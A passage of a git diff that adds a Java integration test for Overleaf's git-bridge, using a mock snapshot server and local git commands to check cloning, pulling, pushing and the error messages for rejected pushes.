--> + <logger name="uk.ac.ic.wlgitbridge" level="${LOG_LEVEL}" /> + + <!-- The root log level determines how much our dependencies put in the logs. --> + <root level="WARN"> + <appender-ref ref="stdout" /> + <appender-ref ref="stderr" /> + </root> +</configuration> diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/WLGitBridgeIntegrationTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/WLGitBridgeIntegrationTest.java new file mode 100644 index 0000000..f706d98 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/WLGitBridgeIntegrationTest.java @@ -0,0 +1,1547 @@ +package uk.ac.ic.wlgitbridge.application; + +import static org.asynchttpclient.Dsl.*; +import static org.junit.Assert.*; + +import java.io.*; +import java.nio.charset.StandardCharsets; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.Arrays; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.concurrent.ExecutionException; +import org.apache.commons.io.FileUtils; +import org.apache.commons.io.IOUtils; +import org.apache.http.HttpEntity; +import org.apache.http.HttpResponse; +import org.apache.http.ParseException; +import org.apache.http.client.ClientProtocolException; +import org.apache.http.client.HttpClient; +import org.apache.http.client.methods.HttpGet; +import org.apache.http.client.methods.HttpHead; +import org.apache.http.client.methods.HttpPost; +import org.apache.http.impl.client.HttpClients; +import org.apache.http.util.EntityUtils; +import org.asynchttpclient.*; +import org.eclipse.jgit.api.errors.GitAPIException; +import org.junit.After; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJobConfig; +import uk.ac.ic.wlgitbridge.snapshot.servermock.server.MockSnapshotServer; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIState; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIStateBuilder; +import uk.ac.ic.wlgitbridge.snapshot.servermock.util.FileUtil; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 11/01/15. 
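+ *
+ * Each test starts a MockSnapshotServer loaded with a state fixture from
+ * src/test/resources, runs a GitBridgeApp against it, and drives a real git
+ * client (via Runtime.exec) to clone, pull, and push.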
+ */ +public class WLGitBridgeIntegrationTest { + + private Runtime runtime = Runtime.getRuntime(); + + private static final String PROJECT_ID = "000000000000000000000000"; + private static final String PROJECT_ID1 = "111111111111111111111111"; + private static final String PROJECT_ID2 = "222222222222222222222222"; + + private Map<String, Map<String, SnapshotAPIState>> states = + new HashMap<String, Map<String, SnapshotAPIState>>() { + { + put( + "canCloneARepository", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canCloneARepository/state/state.json")) + .build()); + } + }); + put( + "canCloneMultipleRepositories", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canCloneMultipleRepositories/state/state.json")) + .build()); + } + }); + put( + "cannotCloneAProtectedProjectWithoutAuthentication", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json")) + .build()); + } + }); + put( + "cannotCloneA4xxProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/cannotCloneA4xxProject/state/state.json")) + .build()); + } + }); + put( + "cannotCloneAMissingProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/cannotCloneAMissingProject/state/state.json")) + .build()); + } + }); + put( + "canPullAModifiedTexFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullAModifiedTexFile/base/state.json")) + .build()); + put( + "withModifiedTexFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullAModifiedTexFile/withModifiedTexFile/state.json")) + .build()); + } + }); + put( + "canPullADeletedTexFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullADeletedTexFile/base/state.json")) + .build()); + put( + "withDeletedTexFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullADeletedTexFile/withDeletedTexFile/state.json")) + .build()); + } + }); + put( + "canPullAModifiedBinaryFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullAModifiedBinaryFile/base/state.json")) + .build()); + put( + "withModifiedBinaryFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json")) + .build()); + } + }); + put( + "canPullADeletedBinaryFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullADeletedBinaryFile/base/state.json")) + .build()); + put( + "withDeletedBinaryFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json")) + .build()); + } + }); + put( + "canPullADuplicateBinaryFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullADuplicateBinaryFile/base/state.json")) + .build()); + put( + "withDuplicateBinaryFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json")) 
+ .build()); + } + }); + put( + "canCloneDuplicateBinaryFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canCloneDuplicateBinaryFiles/state/state.json")) + .build()); + } + }); + put( + "canPullUpdatedBinaryFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullUpdatedBinaryFiles/base/state.json")) + .build()); + put( + "withUpdatedBinaryFiles", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json")) + .build()); + } + }); + put( + "canPullAModifiedNestedFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullAModifiedNestedFile/base/state.json")) + .build()); + put( + "withModifiedNestedFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullAModifiedNestedFile/withModifiedNestedFile/state.json")) + .build()); + } + }); + put( + "canPullDeletedNestedFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullDeletedNestedFiles/base/state.json")) + .build()); + put( + "withDeletedNestedFiles", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json")) + .build()); + } + }); + put( + "canPushFilesSuccessfully", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPushFilesSuccessfully/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnFirstStageOutOfDate", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushFailsOnFirstStageOutOfDate/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnSecondStageOutOfDate", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushFailsOnSecondStageOutOfDate/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnInvalidFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/pushFailsOnInvalidFiles/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnInvalidProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/pushFailsOnInvalidProject/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnUnexpectedError", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/pushFailsOnUnexpectedError/state/state.json")) + .build()); + } + }); + put( + "pushSucceedsAfterRemovingInvalidFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "invalidState", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json")) + .build()); + put( + "validState", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushSucceedsAfterRemovingInvalidFiles/validState/state.json")) + .build()); + } + }); + put( + "canServePushedFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canServePushedFiles/state/state.json")) + .build()); + } + }); + put( + "wlgbCanSwapProjects", + new HashMap<String, SnapshotAPIState>() { 
+ { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/wlgbCanSwapProjects/state/state.json")) + .build()); + } + }); + put( + "pushSubmoduleFailsWithInvalidGitRepo", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushSubmoduleFailsWithInvalidGitRepo/state/state.json")) + .build()); + } + }); + put( + "canMigrateRepository", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canMigrateRepository/state/state.json")) + .build()); + } + }); + put( + "skipMigrationWhenMigratedFromMissing", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/skipMigrationWhenMigratedFromMissing/state/state.json")) + .build()); + } + }); + put( + "canCloneAMigratedRepositoryWithoutChanges", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canCloneAMigratedRepositoryWithoutChanges/state/state.json")) + .build()); + } + }); + put( + "rejectV1Repository", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/rejectV1Repository/state/state.json")) + .build()); + } + }); + put( + "cannotCloneAHasDotGitProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/cannotCloneAHasDotGitProject/state/state.json")) + .build()); + } + }); + put( + "canPullIgnoredForceAddedFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullIgnoredForceAddedFile/base/state.json")) + .build()); + put( + "withUpdatedMainFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json")) + .build()); + } + }); + } + }; + + @Rule public TemporaryFolder folder = new TemporaryFolder(); + + private MockSnapshotServer server; + private GitBridgeApp wlgb; + private File dir; + + @Before + public void setUp() throws Exception { + dir = folder.newFolder(); + } + + @After + public void tearDown() { + if (server != null) { + server.stop(); + } + if (wlgb != null) { + wlgb.stop(); + } + } + + private void gitConfig(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git config user.name TEST", null, dir).waitFor()); + assertEquals(0, runtime.exec("git config user.email test@test.com", null, dir).waitFor()); + assertEquals(0, runtime.exec("git config push.default matching", null, dir).waitFor()); + } + + private File gitClone(String repositoryName, int port, File dir) + throws IOException, InterruptedException { + String repo = "git clone http://git:password@127.0.0.1:" + port + "/" + repositoryName; + Process gitProcess = runtime.exec(repo, null, dir); + int exitCode = gitProcess.waitFor(); + if (exitCode != 0) { + System.err.println("git clone failed. 
Dumping stderr and stdout."); + System.err.println(IOUtils.toString(gitProcess.getErrorStream(), StandardCharsets.UTF_8)); + System.err.println(IOUtils.toString(gitProcess.getInputStream(), StandardCharsets.UTF_8)); + fail("git clone failed"); + } + File repositoryDir = new File(dir, repositoryName); + gitConfig(repositoryDir); + return repositoryDir; + } + + private void gitInit(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git init", null, dir).waitFor()); + gitConfig(dir); + } + + private void gitAdd(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git add -A", null, dir).waitFor()); + } + + private void gitCommit(File dir, String msg) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git commit -m \"" + msg + "\"", null, dir).waitFor()); + } + + private Process gitPush(File dir) throws IOException, InterruptedException { + return gitPush(dir, 0); + } + + private Process gitPush(File dir, int exit) throws IOException, InterruptedException { + Process ret = runtime.exec("git push", null, dir); + assertEquals(exit, ret.waitFor()); + return ret; + } + + private void gitPull(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git pull", null, dir).waitFor()); + } + + @Test + public void canCloneARepository() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3857, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33857, 3857)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33857, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneARepository/state/" + PROJECT_ID), testprojDir.toPath())); + } + + @Test + public void canCloneMultipleRepositories() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3858, getResource("/canCloneMultipleRepositories").toFile()); + server.start(); + server.setState(states.get("canCloneMultipleRepositories").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33858, 3858)}); + wlgb.run(); + File testproj1Dir = gitClone(PROJECT_ID1, 33858, dir); + File testproj2Dir = gitClone(PROJECT_ID2, 33858, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneMultipleRepositories/state/" + PROJECT_ID1), + testproj1Dir.toPath())); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneMultipleRepositories/state/" + PROJECT_ID2), + testproj2Dir.toPath())); + } + + @Test + public void canPullAModifiedTexFile() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3859, getResource("/canPullAModifiedTexFile").toFile()); + server.start(); + server.setState(states.get("canPullAModifiedTexFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33859, 3859)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33859, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedTexFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullAModifiedTexFile").get("withModifiedTexFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedTexFile/withModifiedTexFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullADeletedTexFile() throws 
IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3860, getResource("/canPullADeletedTexFile").toFile()); + server.start(); + server.setState(states.get("canPullADeletedTexFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33860, 3860)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33860, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedTexFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullADeletedTexFile").get("withDeletedTexFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedTexFile/withDeletedTexFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullAModifiedBinaryFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3862, getResource("/canPullAModifiedBinaryFile").toFile()); + server.start(); + server.setState(states.get("canPullAModifiedBinaryFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33862, 3862)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33862, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedBinaryFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullAModifiedBinaryFile").get("withModifiedBinaryFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedBinaryFile/withModifiedBinaryFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullADeletedBinaryFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3863, getResource("/canPullADeletedBinaryFile").toFile()); + server.start(); + server.setState(states.get("canPullADeletedBinaryFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33863, 3863)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33863, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedBinaryFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullADeletedBinaryFile").get("withDeletedBinaryFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedBinaryFile/withDeletedBinaryFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullADuplicateBinaryFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(4001, getResource("/canPullADuplicateBinaryFile").toFile()); + server.start(); + server.setState(states.get("canPullADuplicateBinaryFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(44001, 4001)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 44001, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADuplicateBinaryFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullADuplicateBinaryFile").get("withDuplicateBinaryFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADuplicateBinaryFile/withDuplicateBinaryFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canCloneDuplicateBinaryFiles() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(4002, getResource("/canCloneDuplicateBinaryFiles").toFile()); + 
server.start(); + server.setState(states.get("canCloneDuplicateBinaryFiles").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(44002, 4002)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 44002, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneDuplicateBinaryFiles/state/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullUpdatedBinaryFiles() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(4003, getResource("/canPullUpdatedBinaryFiles").toFile()); + server.start(); + server.setState(states.get("canPullUpdatedBinaryFiles").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(44003, 4003)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 44003, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullUpdatedBinaryFiles/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullUpdatedBinaryFiles").get("withUpdatedBinaryFiles")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullAModifiedNestedFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3864, getResource("/canPullAModifiedNestedFile").toFile()); + server.start(); + server.setState(states.get("canPullAModifiedNestedFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33864, 3864)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33864, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedNestedFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullAModifiedNestedFile").get("withModifiedNestedFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedNestedFile/withModifiedNestedFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullDeletedNestedFiles() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3865, getResource("/canPullDeletedNestedFiles").toFile()); + server.start(); + server.setState(states.get("canPullDeletedNestedFiles").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33865, 3865)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33865, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullDeletedNestedFiles/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullDeletedNestedFiles").get("withDeletedNestedFiles")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullDeletedNestedFiles/withDeletedNestedFiles/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPushFilesSuccessfully() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3866, getResource("/canPushFilesSuccessfully").toFile()); + server.start(); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33866, 3866)}); + wlgb.run(); + server.setState(states.get("canPushFilesSuccessfully").get("state")); + File testprojDir = gitClone(PROJECT_ID, 33866, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPushFilesSuccessfully/state/" + PROJECT_ID), testprojDir.toPath())); + assertEquals(0, runtime.exec("touch push.tex", 
null, testprojDir).waitFor()); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + gitPush(testprojDir); + } + + private static final String EXPECTED_OUT_PUSH_OUT_OF_DATE_FIRST = + "error: failed to push some refs to 'http://127.0.0.1:33867/" + + PROJECT_ID + + "'\n" + + "hint: Updates were rejected because the tip of your current branch is behind\n" + + "hint: its remote counterpart. Integrate the remote changes (e.g.\n" + + "hint: 'git pull ...') before pushing again.\n" + + "hint: See the 'Note about fast-forwards' in 'git push --help' for details.\n"; + + @Test + public void pushFailsOnFirstStageOutOfDate() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3867, getResource("/pushFailsOnFirstStageOutOfDate").toFile()); + server.start(); + server.setState(states.get("pushFailsOnFirstStageOutOfDate").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33867, 3867)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33867, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnFirstStageOutOfDate/state/" + PROJECT_ID), + testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + assertEquals(EXPECTED_OUT_PUSH_OUT_OF_DATE_FIRST, Util.fromStream(push.getErrorStream(), 2)); + } + + private static final String EXPECTED_OUT_PUSH_OUT_OF_DATE_SECOND = + "error: failed to push some refs to 'http://127.0.0.1:33868/" + + PROJECT_ID + + "'\n" + + "hint: Updates were rejected because the tip of your current branch is behind\n" + + "hint: its remote counterpart. Integrate the remote changes (e.g.\n" + + "hint: 'git pull ...') before pushing again.\n" + + "hint: See the 'Note about fast-forwards' in 'git push --help' for details.\n"; + + @Test + public void pushFailsOnSecondStageOutOfDate() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3868, getResource("/pushFailsOnSecondStageOutOfDate").toFile()); + server.start(); + server.setState(states.get("pushFailsOnSecondStageOutOfDate").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33868, 3868)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33868, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnSecondStageOutOfDate/state/" + PROJECT_ID), + testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + assertEquals(EXPECTED_OUT_PUSH_OUT_OF_DATE_SECOND, Util.fromStream(push.getErrorStream(), 2)); + } + + private static final List<String> EXPECTED_OUT_PUSH_INVALID_FILES = + Arrays.asList( + "remote: hint: You have 4 invalid files in your Overleaf project:", + "remote: hint: file1.invalid (error)", + "remote: hint: file2.exe (invalid file extension)", + "remote: hint: hello world.png (rename to: hello_world.png)", + "remote: hint: an image.jpg (rename to: an_image.jpg)", + "To http://127.0.0.1:33869/" + PROJECT_ID, + "! 
[remote rejected] master -> master (invalid files)", + "error: failed to push some refs to 'http://127.0.0.1:33869/" + PROJECT_ID + "'"); + + @Test + public void pushFailsOnInvalidFiles() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3869, getResource("/pushFailsOnInvalidFiles").toFile()); + server.start(); + server.setState(states.get("pushFailsOnInvalidFiles").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33869, 3869)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33869, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnInvalidFiles/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_INVALID_FILES, actual); + } + + private static final List<String> EXPECTED_OUT_PUSH_INVALID_PROJECT = + Arrays.asList( + "remote: hint: project: no main file", + "remote: hint: The project would have no (editable) main .tex file.", + "To http://127.0.0.1:33870/" + PROJECT_ID, + "! [remote rejected] master -> master (invalid project)", + "error: failed to push some refs to 'http://127.0.0.1:33870/" + PROJECT_ID + "'"); + + @Test + public void pushFailsOnInvalidProject() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3870, getResource("/pushFailsOnInvalidProject").toFile()); + server.start(); + server.setState(states.get("pushFailsOnInvalidProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33870, 3870)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33870, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnInvalidProject/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_INVALID_PROJECT, actual); + } + + private static final List<String> EXPECTED_OUT_PUSH_UNEXPECTED_ERROR = + Arrays.asList( + "remote: hint: There was an internal error with the Overleaf server.", + "remote: hint: Please contact Overleaf.", + "To http://127.0.0.1:33871/" + PROJECT_ID, + "! 
[remote rejected] master -> master (Overleaf error)", + "error: failed to push some refs to 'http://127.0.0.1:33871/" + PROJECT_ID + "'"); + + /* this one prints a stack trace */ + @Test + public void pushFailsOnUnexpectedError() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3871, getResource("/pushFailsOnUnexpectedError").toFile()); + server.start(); + server.setState(states.get("pushFailsOnUnexpectedError").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33871, 3871)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33871, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnUnexpectedError/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_UNEXPECTED_ERROR, actual); + } + + private static final List<String> EXPECTED_OUT_PUSH_INVALID_EXE_FILE = + Arrays.asList( + "remote: error: invalid files", + "remote:", + "remote: hint: You have 1 invalid files in your Overleaf project:", + "remote: hint: file1.exe (invalid file extension)", + "To http://127.0.0.1:33872/" + PROJECT_ID, + "! [remote rejected] master -> master (invalid files)", + "error: failed to push some refs to 'http://127.0.0.1:33872/" + PROJECT_ID + "'"); + + @Test + public void pushSucceedsAfterRemovingInvalidFiles() + throws IOException, GitAPIException, InterruptedException { + server = + new MockSnapshotServer( + 3872, getResource("/pushSucceedsAfterRemovingInvalidFiles").toFile()); + server.start(); + server.setState(states.get("pushSucceedsAfterRemovingInvalidFiles").get("invalidState")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33872, 3872)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33872, dir); + + // try to push invalid file; it should fail + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushSucceedsAfterRemovingInvalidFiles/invalidState/" + PROJECT_ID), + testprojDir.toPath())); + assertEquals(0, runtime.exec("touch file1.exe", null, testprojDir).waitFor()); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 0, "[K"); + assertEquals(EXPECTED_OUT_PUSH_INVALID_EXE_FILE, actual); + + // remove invalid file and push again; it should succeed this time + assertEquals(0, runtime.exec("git rm file1.exe", null, testprojDir).waitFor()); + gitCommit(testprojDir, "remove_invalid_file"); + server.setState(states.get("pushSucceedsAfterRemovingInvalidFiles").get("validState")); + gitPush(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushSucceedsAfterRemovingInvalidFiles/validState/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test 